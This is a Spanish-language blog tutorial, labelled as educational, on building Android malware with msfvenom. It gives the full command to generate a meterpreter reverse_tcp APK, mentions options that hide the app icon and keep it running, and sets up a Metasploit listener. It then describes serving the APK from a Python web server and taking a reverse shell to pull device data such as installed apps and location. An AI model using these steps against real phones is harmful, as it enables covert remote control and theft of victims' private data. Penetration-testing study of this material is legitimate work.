CARGANDO

Escribe para buscar

Malware en Android

Disclamer: Todas las pruebas, ejemplos, códigos y/o explicaciones que aquí se exponen tienen un ámbito didáctico. Se rechaza cualquier actividad ilícita generada por lo expuesto en este escrito.

En anteriores post hablábamos de como se puede crear malware mediante MSFvenom en aplicaciones de escritorio. En esta entrada, se utilizará la misma herramienta para crear malware en Android de forma sencilla.

Para desarrollar esta demostración utilizaremos un terminal Android en cualquier versión y una consola de meterpreter desde una distribución Linux como puede ser Kali.

Creación del malware

La creación del malware en Android mediante MSFvenom es muy parecida a entornos de escritorio, lo único que se cambiará es el tipo de reverse shell y la salida del ejecutable. Utilizaremos el siguiente comando:

# msfvenom –p android/meterpreter/reverse_tcp LHOST=172.17.0.3 LPORT=9001 -f raw -o SysBeards_Client.apk

La anterior instrucción acepta las opciones “AndroidHideAppIcon=true” y “AndroidWakeLock=true“, para ocultar la app y mantener activa pese al bloqueo de pantalla. En esta prueba de concepto no las incluimos.

Preparación listener

En este punto ya tenemos preparada la APK que se ejecutará en el dispositivo Android, pero antes de ello, es necesario preparar el listener mediante Metasploit donde recibiremos la shell. Esto lo podemos hacer mediante:

msf6 > use exploit/multi/handler

msf6 > set payload android/meterpreter/reverse_tcp msd6 > set LHOST 172.17.0.3

msf6 > set LPORT 9001

msf6 > run

Ejecución APK

Ahora que está todo preparado ya es posible ejecutar la APK en el dispositivo Android. Para hacer llegar la app podemos montar rápidamente un servidor web con Python (python -m http.server 80) e importante activar los orígenes desconocidos.

Cuando se ejecute la aplicación veremos unas ventanas que no gustan mucho…

No todo podía ser tan “bonito”. Obviamente la aplicación es maliciosa y lo detecta Google Play Protect. Aun así, para probar el funcionamiento, ejecutaremos la app. Ahora veremos como nuestra aplicación solicita multitud de permisos que nosotros amablemente aceptaremos 🙂

Reverse Shell

Y una vez está todo corriendo, nuestra consola de Metasploit recibirá la shell!

Desde este punto se podrán ejecutar comandos propios de meterpreter para extraer información del dispositivo como la versión de Android, las aplicaciones instaladas, la posición geográfica, etc.

Ahora que conocemos como crear malware en Android, faltaría aplicar técnicas de evasión para que las protecciones que pueda tener el dispositivo no lo detecten. Pero esto ya, es “otro cantar”.

¿Qué os ha parecido?¿Conocíais esta posibilidad dentro de MSFvenom? Dejadnos los comentarios 😉

Ah, hola 👋
Un placer conocerte.

Veo que te gusta la tecnología, ¿quieres que te mandemos una newsletter semanal?.

Acepto la política de privacidad *

¡No enviamos spam!. yo también lo odio a muerte!.

Tags:

Deja un Comentario

Your email address will not be published. Required fields are marked *